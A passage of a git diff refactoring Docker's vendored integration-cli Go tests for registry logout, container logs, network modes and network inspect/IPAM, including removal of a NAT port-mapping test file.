*DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) tmp, err := ioutil.TempDir("", "integration-cli-") c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmp) externalAuthConfig := `{ "credsStore": "shell-test" }` @@ -35,26 +38,29 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + _, err = s.d.Cmd("--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) + c.Assert(err, checker.IsNil) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") c.Assert(string(b), checker.Contains, privateRegistryURL) - dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) - dockerCmd(c, "--config", tmp, "push", repoName) - - dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) + _, err = s.d.Cmd("--config", tmp, "tag", "busybox", repoName) + c.Assert(err, checker.IsNil) + _, err = s.d.Cmd("--config", tmp, "push", repoName) + c.Assert(err, checker.IsNil) + _, err = s.d.Cmd("--config", tmp, "logout", privateRegistryURL) + c.Assert(err, checker.IsNil) b, err = ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) c.Assert(string(b), checker.Not(checker.Contains), privateRegistryURL) // check I cannot pull anymore - out, _, err := dockerCmdWithError("--config", tmp, "pull", repoName) + out, err := s.d.Cmd("--config", tmp, "pull", repoName) c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error: image dockercli/busybox:authtest not found") + c.Assert(out, checker.Contains, "no basic auth credentials") } // #23100 @@ -71,7 +77,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c * os.Setenv("PATH", testPath) cmd := 
exec.Command("docker-credential-shell-test", "store") - stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.username, s.reg.password))) + stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.Username(), s.reg.Password()))) cmd.Stdin = stdin c.Assert(cmd.Run(), checker.IsNil) @@ -84,7 +90,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c * err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go index d2dcad1052..17ee5deaad 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go @@ -8,47 +8,33 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/pkg/jsonmessage" "github.com/go-check/check" + "gotest.tools/icmd" ) // This used to work, it test a log of PageSize-1 (gh#4851) func (s *DockerSuite) TestLogsContainerSmallerThanPage(c *check.C) { - testLen := 32767 - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) - - id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) - - out, _ = dockerCmd(c, 
"logs", id) - - c.Assert(out, checker.HasLen, testLen+1) + testLogsContainerPagination(c, 32767) } // Regression test: When going over the PageSize, it used to panic (gh#4851) func (s *DockerSuite) TestLogsContainerBiggerThanPage(c *check.C) { - testLen := 32768 - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) - - id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) - - out, _ = dockerCmd(c, "logs", id) - - c.Assert(out, checker.HasLen, testLen+1) + testLogsContainerPagination(c, 32768) } // Regression test: When going much over the PageSize, it used to block (gh#4851) func (s *DockerSuite) TestLogsContainerMuchBiggerThanPage(c *check.C) { - testLen := 33000 - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) + testLogsContainerPagination(c, 33000) +} +func testLogsContainerPagination(c *check.C, testLen int) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) id := strings.TrimSpace(out) dockerCmd(c, "wait", id) - out, _ = dockerCmd(c, "logs", id) - c.Assert(out, checker.HasLen, testLen+1) } @@ -69,7 +55,7 @@ func (s *DockerSuite) TestLogsTimestamps(c *check.C) { for _, l := range lines { if l != "" { - _, err := time.Parse(jsonlog.RFC3339NanoFixed+" ", ts.FindString(l)) + _, err := time.Parse(jsonmessage.RFC3339NanoFixed+" ", ts.FindString(l)) c.Assert(err, checker.IsNil, check.Commentf("Failed to parse timestamp from %v", l)) // ensure we have padded 0's c.Assert(l[29], checker.Equals, uint8('Z')) @@ -79,18 +65,13 @@ func (s *DockerSuite) TestLogsTimestamps(c *check.C) { func (s *DockerSuite) TestLogsSeparateStderr(c *check.C) { msg := "stderr_log" - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)) - + 
out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)).Combined() id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) - - stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id) - - c.Assert(stdout, checker.Equals, "") - - stderr = strings.TrimSpace(stderr) - - c.Assert(stderr, checker.Equals, msg) + cli.DockerCmd(c, "wait", id) + cli.DockerCmd(c, "logs", id).Assert(c, icmd.Expected{ + Out: "", + Err: msg, + }) } func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) { @@ -98,54 +79,51 @@ func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) { // a bunch of ANSI escape sequences before the "stderr_log" message. testRequires(c, DaemonIsLinux) msg := "stderr_log" - out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)) - + out := cli.DockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)).Combined() id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) - - stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id) - c.Assert(stderr, checker.Equals, "") + cli.DockerCmd(c, "wait", id) - stdout = strings.TrimSpace(stdout) - c.Assert(stdout, checker.Equals, msg) + cli.DockerCmd(c, "logs", id).Assert(c, icmd.Expected{ + Out: msg, + Err: "", + }) } func (s *DockerSuite) TestLogsTail(c *check.C) { testLen := 100 - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen)) + out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen)).Combined() id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) + cli.DockerCmd(c, "wait", id) - out, _ = dockerCmd(c, "logs", "--tail", "0", id) + out = cli.DockerCmd(c, "logs", "--tail", "0", id).Combined() lines := strings.Split(out, "\n") c.Assert(lines, checker.HasLen, 1) - out, _ = dockerCmd(c, "logs", "--tail", "5", id) + out = cli.DockerCmd(c, "logs", "--tail", "5", 
id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, 6) - out, _ = dockerCmd(c, "logs", "--tail", "99", id) + out = cli.DockerCmd(c, "logs", "--tail", "99", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, 100) - out, _ = dockerCmd(c, "logs", "--tail", "all", id) + out = cli.DockerCmd(c, "logs", "--tail", "all", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, testLen+1) - out, _ = dockerCmd(c, "logs", "--tail", "-1", id) + out = cli.DockerCmd(c, "logs", "--tail", "-1", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, testLen+1) - out, _, _ = dockerCmdWithStdoutStderr(c, "logs", "--tail", "random", id) + out = cli.DockerCmd(c, "logs", "--tail", "random", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, testLen+1) } func (s *DockerSuite) TestLogsFollowStopped(c *check.C) { dockerCmd(c, "run", "--name=test", "busybox", "echo", "hello") - id, err := getIDByName("test") - c.Assert(err, check.IsNil) + id := getIDByName(c, "test") logsCmd := exec.Command(dockerBinary, "logs", "-f", id) c.Assert(logsCmd.Start(), checker.IsNil) @@ -187,14 +165,14 @@ func (s *DockerSuite) TestLogsSince(c *check.C) { // Test with default value specified and parameter omitted expected := []string{"log1", "log2", "log3"} - for _, cmd := range []*exec.Cmd{ - exec.Command(dockerBinary, "logs", "-t", name), - exec.Command(dockerBinary, "logs", "-t", "--since=0", name), + for _, cmd := range [][]string{ + {"logs", "-t", name}, + {"logs", "-t", "--since=0", name}, } { - out, _, err = runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to log container: %s", out)) + result := icmd.RunCommand(dockerBinary, cmd...) 
+ result.Assert(c, icmd.Success) for _, v := range expected { - c.Assert(out, checker.Contains, v) + c.Assert(result.Combined(), checker.Contains, v) } } } @@ -236,14 +214,15 @@ func (s *DockerSuite) TestLogsSinceFutureFollow(c *check.C) { func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) { // TODO Windows: Fix this test for TP5. testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", `usleep 600000;yes X | head -c 200000`) + expected := 150000 + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", fmt.Sprintf("usleep 600000; yes X | head -c %d", expected)) id := strings.TrimSpace(out) stopSlowRead := make(chan bool) go func() { - exec.Command(dockerBinary, "wait", id).Run() + dockerCmd(c, "wait", id) stopSlowRead <- true }() @@ -251,20 +230,45 @@ func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) { stdout, err := logCmd.StdoutPipe() c.Assert(err, checker.IsNil) c.Assert(logCmd.Start(), checker.IsNil) + defer func() { go logCmd.Wait() }() // First read slowly - bytes1, err := consumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead) + bytes1, err := ConsumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead) c.Assert(err, checker.IsNil) // After the container has finished we can continue reading fast - bytes2, err := consumeWithSpeed(stdout, 32*1024, 0, nil) + bytes2, err := ConsumeWithSpeed(stdout, 32*1024, 0, nil) c.Assert(err, checker.IsNil) + c.Assert(logCmd.Wait(), checker.IsNil) + actual := bytes1 + bytes2 - expected := 200000 c.Assert(actual, checker.Equals, expected) } +// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping +// for interval duration. Returns total read bytes. Send true to the +// stop channel to return before reading to EOF on the reader. 
+func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { + buffer := make([]byte, chunkSize) + for { + var readBytes int + readBytes, err = reader.Read(buffer) + n += readBytes + if err != nil { + if err == io.EOF { + err = nil + } + return + } + select { + case <-stop: + return + case <-time.After(interval): + } + } +} + func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) { out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 2; done") id := strings.TrimSpace(out) @@ -276,6 +280,7 @@ func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) { r, w := io.Pipe() cmd.Stdout = w c.Assert(cmd.Start(), checker.IsNil) + go cmd.Wait() // Make sure pipe is written to chErr := make(chan error) @@ -286,7 +291,8 @@ func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) { }() c.Assert(<-chErr, checker.IsNil) c.Assert(cmd.Process.Kill(), checker.IsNil) - + r.Close() + cmd.Wait() // NGoroutines is not updated right away, so we need to wait before failing c.Assert(waitForGoroutines(nroutines), checker.IsNil) } @@ -300,8 +306,10 @@ func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) { c.Assert(err, checker.IsNil) cmd := exec.Command(dockerBinary, "logs", "-f", id) c.Assert(cmd.Start(), checker.IsNil) + go cmd.Wait() time.Sleep(200 * time.Millisecond) c.Assert(cmd.Process.Kill(), checker.IsNil) + cmd.Wait() // NGoroutines is not updated right away, so we need to wait before failing c.Assert(waitForGoroutines(nroutines), checker.IsNil) @@ -310,8 +318,8 @@ func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) { func (s *DockerSuite) TestLogsCLIContainerNotFound(c *check.C) { name := "testlogsnocontainer" out, _, _ := dockerCmdWithError("logs", name) - message := fmt.Sprintf("Error: No such container: %s\n", name) - c.Assert(out, checker.Equals, message) + message := fmt.Sprintf("No such container: %s\n", name) + 
c.Assert(out, checker.Contains, message) } func (s *DockerSuite) TestLogsWithDetails(c *check.C) { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go deleted file mode 100644 index 7f4cc2cbd7..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go +++ /dev/null @@ -1,93 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "net" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func startServerContainer(c *check.C, msg string, port int) string { - name := "server" - cmd := []string{ - "-d", - "-p", fmt.Sprintf("%d:%d", port, port), - "busybox", - "sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port), - } - c.Assert(waitForContainer(name, cmd...), check.IsNil) - return name -} - -func getExternalAddress(c *check.C) net.IP { - iface, err := net.InterfaceByName("eth0") - if err != nil { - c.Skip(fmt.Sprintf("Test not running with `make test`. 
Interface eth0 not found: %v", err)) - } - - ifaceAddrs, err := iface.Addrs() - c.Assert(err, check.IsNil) - c.Assert(ifaceAddrs, checker.Not(checker.HasLen), 0) - - ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String()) - c.Assert(err, check.IsNil) - - return ifaceIP -} - -func getContainerLogs(c *check.C, containerID string) string { - out, _ := dockerCmd(c, "logs", containerID) - return strings.Trim(out, "\r\n") -} - -func getContainerStatus(c *check.C, containerID string) string { - out := inspectField(c, containerID, "State.Running") - return out -} - -func (s *DockerSuite) TestNetworkNat(c *check.C) { - testRequires(c, DaemonIsLinux, SameHostDaemon) - msg := "it works" - startServerContainer(c, msg, 8080) - endpoint := getExternalAddress(c) - conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080)) - c.Assert(err, check.IsNil) - - data, err := ioutil.ReadAll(conn) - conn.Close() - c.Assert(err, check.IsNil) - - final := strings.TrimRight(string(data), "\n") - c.Assert(final, checker.Equals, msg) -} - -func (s *DockerSuite) TestNetworkLocalhostTCPNat(c *check.C) { - testRequires(c, DaemonIsLinux, SameHostDaemon) - var ( - msg = "hi yall" - ) - startServerContainer(c, msg, 8081) - conn, err := net.Dial("tcp", "localhost:8081") - c.Assert(err, check.IsNil) - - data, err := ioutil.ReadAll(conn) - conn.Close() - c.Assert(err, check.IsNil) - - final := strings.TrimRight(string(data), "\n") - c.Assert(final, checker.Equals, msg) -} - -func (s *DockerSuite) TestNetworkLoopbackNat(c *check.C) { - testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) - msg := "it works" - startServerContainer(c, msg, 8080) - endpoint := getExternalAddress(c) - out, _ := dockerCmd(c, "run", "-t", "--net=container:server", "busybox", - "sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String())) - final := strings.TrimRight(string(out), "\n") - c.Assert(final, checker.Equals, msg) -} diff --git 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go index 4dfad937b5..76f9898d88 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go @@ -1,7 +1,9 @@ package main import ( - "github.com/docker/docker/pkg/integration/checker" + "strings" + + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/runconfig" "github.com/go-check/check" ) @@ -44,10 +46,10 @@ func (s *DockerSuite) TestNetHostname(c *check.C) { c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHostname.Error()) out, _ = dockerCmdWithFail(c, "run", "--net=container", "busybox", "ps") - c.Assert(out, checker.Contains, "--net: invalid net mode: invalid container format container:") + c.Assert(out, checker.Contains, "invalid container format container:") out, _ = dockerCmdWithFail(c, "run", "--net=weird", "busybox", "ps") - c.Assert(out, checker.Contains, "network weird not found") + c.Assert(strings.ToLower(out), checker.Contains, "not found") } func (s *DockerSuite) TestConflictContainerNetworkAndLinks(c *check.C) { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go index 97f204ab47..95f7ccfff0 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go @@ -10,14 +10,15 @@ import ( "net/http" "net/http/httptest" "os" - "path/filepath" "strings" "time" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/versions/v1p20" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" + 
"github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/runconfig" "github.com/docker/libnetwork/driverapi" @@ -27,6 +28,8 @@ import ( "github.com/docker/libnetwork/netlabel" "github.com/go-check/check" "github.com/vishvananda/netlink" + "golang.org/x/sys/unix" + "gotest.tools/icmd" ) const dummyNetworkDriver = "dummy-network-driver" @@ -43,16 +46,18 @@ func init() { type DockerNetworkSuite struct { server *httptest.Server ds *DockerSuite - d *Daemon + d *daemon.Daemon } func (s *DockerNetworkSuite) SetUpTest(c *check.C) { - s.d = NewDaemon(c) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerNetworkSuite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) + if s.d != nil { + s.d.Stop(c) + s.ds.TearDownTest(c) + } } func (s *DockerNetworkSuite) SetUpSuite(c *check.C) { @@ -268,7 +273,7 @@ func assertNwList(c *check.C, out string, expectNws []string) { func getNwResource(c *check.C, name string) *types.NetworkResource { out, _ := dockerCmd(c, "network", "inspect", name) - nr := []types.NetworkResource{} + var nr []types.NetworkResource err := json.Unmarshal([]byte(out), &nr) c.Assert(err, check.IsNil) return &nr[0] @@ -281,39 +286,6 @@ func (s *DockerNetworkSuite) TestDockerNetworkLsDefault(c *check.C) { } } -func (s *DockerSuite) TestNetworkLsFormat(c *check.C) { - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "network", "ls", "--format", "{{.Name}}") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - - expected := []string{"bridge", "host", "none"} - var names []string - names = append(names, lines...) 
- c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) -} - -func (s *DockerSuite) TestNetworkLsFormatDefaultFormat(c *check.C) { - testRequires(c, DaemonIsLinux) - - config := `{ - "networksFormat": "{{ .Name }} default" -}` - d, err := ioutil.TempDir("", "integration-cli-") - c.Assert(err, checker.IsNil) - defer os.RemoveAll(d) - - err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) - c.Assert(err, checker.IsNil) - - out, _ := dockerCmd(c, "--config", d, "network", "ls") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - - expected := []string{"bridge default", "host default", "none default"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) -} - func (s *DockerNetworkSuite) TestDockerNetworkCreatePredefined(c *check.C) { predefined := []string{"bridge", "host", "none", "default"} for _, net := range predefined { @@ -327,7 +299,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkCreateHostBind(c *check.C) { dockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind") assertNwIsAvailable(c, "testbind") - out, _ := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000") + out := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000") id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) out, _ = dockerCmd(c, "ps") @@ -344,6 +316,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkRmPredefined(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkLsFilter(c *check.C) { + testRequires(c, OnlyDefaultNetworks) testNet := "testnet1" testLabel := "foo" testValue := "bar" @@ -453,7 +426,7 @@ func (s *DockerSuite) TestDockerNetworkDeleteMultiple(c *check.C) { func (s *DockerSuite) 
TestDockerNetworkInspect(c *check.C) { out, _ := dockerCmd(c, "network", "inspect", "host") - networkResources := []types.NetworkResource{} + var networkResources []types.NetworkResource err := json.Unmarshal([]byte(out), &networkResources) c.Assert(err, check.IsNil) c.Assert(networkResources, checker.HasLen, 1) @@ -475,32 +448,51 @@ func (s *DockerSuite) TestDockerNetworkInspectWithID(c *check.C) { func (s *DockerSuite) TestDockerInspectMultipleNetwork(c *check.C) { result := dockerCmdWithResult("network", "inspect", "host", "none") - c.Assert(result, icmd.Matches, icmd.Success) + result.Assert(c, icmd.Success) - networkResources := []types.NetworkResource{} + var networkResources []types.NetworkResource err := json.Unmarshal([]byte(result.Stdout()), &networkResources) c.Assert(err, check.IsNil) c.Assert(networkResources, checker.HasLen, 2) +} - // Should print an error, return an exitCode 1 *but* should print the host network - result = dockerCmdWithResult("network", "inspect", "host", "nonexistent") - c.Assert(result, icmd.Matches, icmd.Expected{ +func (s *DockerSuite) TestDockerInspectMultipleNetworksIncludingNonexistent(c *check.C) { + // non-existent network was not at the beginning of the inspect list + // This should print an error, return an exitCode 1 and print the host network + result := dockerCmdWithResult("network", "inspect", "host", "nonexistent") + result.Assert(c, icmd.Expected{ ExitCode: 1, Err: "Error: No such network: nonexistent", Out: "host", }) - networkResources = []types.NetworkResource{} - err = json.Unmarshal([]byte(result.Stdout()), &networkResources) + var networkResources []types.NetworkResource + err := json.Unmarshal([]byte(result.Stdout()), &networkResources) + c.Assert(err, check.IsNil) c.Assert(networkResources, checker.HasLen, 1) + // Only one non-existent network to inspect // Should print an error and return an exitCode, nothing else result = dockerCmdWithResult("network", "inspect", "nonexistent") - c.Assert(result, 
icmd.Matches, icmd.Expected{ + result.Assert(c, icmd.Expected{ ExitCode: 1, Err: "Error: No such network: nonexistent", Out: "[]", }) + + // non-existent network was at the beginning of the inspect list + // Should not fail fast, and still print host network but print an error + result = dockerCmdWithResult("network", "inspect", "nonexistent", "host") + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Error: No such network: nonexistent", + Out: "host", + }) + + networkResources = []types.NetworkResource{} + err = json.Unmarshal([]byte(result.Stdout()), &networkResources) + c.Assert(err, check.IsNil) + c.Assert(networkResources, checker.HasLen, 1) } func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) { @@ -520,7 +512,7 @@ func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) { }() out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect") - networkResources := []types.NetworkResource{} + var networkResources []types.NetworkResource err := json.Unmarshal([]byte(out), &networkResources) c.Assert(err, check.IsNil) c.Assert(networkResources, checker.HasLen, 1) @@ -534,7 +526,7 @@ func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) { // check whether network inspect works properly out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect") - newNetRes := []types.NetworkResource{} + var newNetRes []types.NetworkResource err = json.Unmarshal([]byte(out), &newNetRes) c.Assert(err, check.IsNil) c.Assert(newNetRes, checker.HasLen, 1) @@ -598,6 +590,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnect(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) { + testRequires(c, SameHostDaemon) // test0 bridge network dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test1") assertNwIsAvailable(c, "test1") @@ -638,6 +631,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) { } func (s 
*DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) { + testRequires(c, SameHostDaemon) // Create a bridge network using custom ipam driver dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "br0") assertNwIsAvailable(c, "br0") @@ -653,6 +647,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) { + testRequires(c, SameHostDaemon) // Create a bridge network using custom ipam driver and options dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "--ipam-opt", "opt1=drv1", "--ipam-opt", "opt2=drv2", "br0") assertNwIsAvailable(c, "br0") @@ -664,6 +659,22 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) { c.Assert(opts["opt2"], checker.Equals, "drv2") } +func (s *DockerNetworkSuite) TestDockerNetworkNullIPAMDriver(c *check.C) { + testRequires(c, SameHostDaemon) + // Create a network with null ipam driver + _, _, err := dockerCmdWithError("network", "create", "-d", dummyNetworkDriver, "--ipam-driver", "null", "test000") + c.Assert(err, check.IsNil) + assertNwIsAvailable(c, "test000") + + // Verify the inspect data contains the default subnet provided by the null + // ipam driver and no gateway, as the null ipam driver does not provide one + nr := getNetworkResource(c, "test000") + c.Assert(nr.IPAM.Driver, checker.Equals, "null") + c.Assert(len(nr.IPAM.Config), checker.Equals, 1) + c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "0.0.0.0/0") + c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "") +} + func (s *DockerNetworkSuite) TestDockerNetworkInspectDefault(c *check.C) { nr := getNetworkResource(c, "none") c.Assert(nr.Driver, checker.Equals, "null") @@ -727,7 +738,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomSpecified(c *check.C) c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254") c.Assert(nr.Internal, checker.False) dockerCmd(c, "network", "rm", "br0") - 
assertNwNotAvailable(c, "test01") + assertNwNotAvailable(c, "br0") } func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C) { @@ -755,6 +766,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C } func (s *DockerNetworkSuite) TestDockerNetworkDriverOptions(c *check.C) { + testRequires(c, SameHostDaemon) dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "-o", "opt1=drv1", "-o", "opt2=drv2", "testopt") assertNwIsAvailable(c, "testopt") gopts := remoteDriverNetworkRequest.Options[netlabel.GenericData] @@ -798,16 +810,14 @@ func (s *DockerDaemonSuite) TestDockerNetworkNoDiscoveryDefaultBridgeNetwork(c * hostsFile := "/etc/hosts" bridgeName := "external-bridge" bridgeIP := "192.169.255.254/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = s.d.StartWithBusybox("--bridge", bridgeName) - c.Assert(err, check.IsNil) - defer s.d.Restart() + s.d.StartWithBusybox(c, "--bridge", bridgeName) + defer s.d.Restart(c) // run two containers and store first container's etc/hosts content - out, err = s.d.Cmd("run", "-d", "busybox", "top") + out, err := s.d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil) cid1 := strings.TrimSpace(out) defer s.d.Cmd("stop", cid1) @@ -865,18 +875,15 @@ func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) { out, _ := dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top") cid1 := strings.TrimSpace(out) - hosts1, err := readContainerFileWithExec(cid1, hostsFile) - c.Assert(err, checker.IsNil) + hosts1 := readContainerFileWithExec(c, cid1, hostsFile) out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top") cid2 := strings.TrimSpace(out) - hosts2, err := readContainerFileWithExec(cid2, hostsFile) - 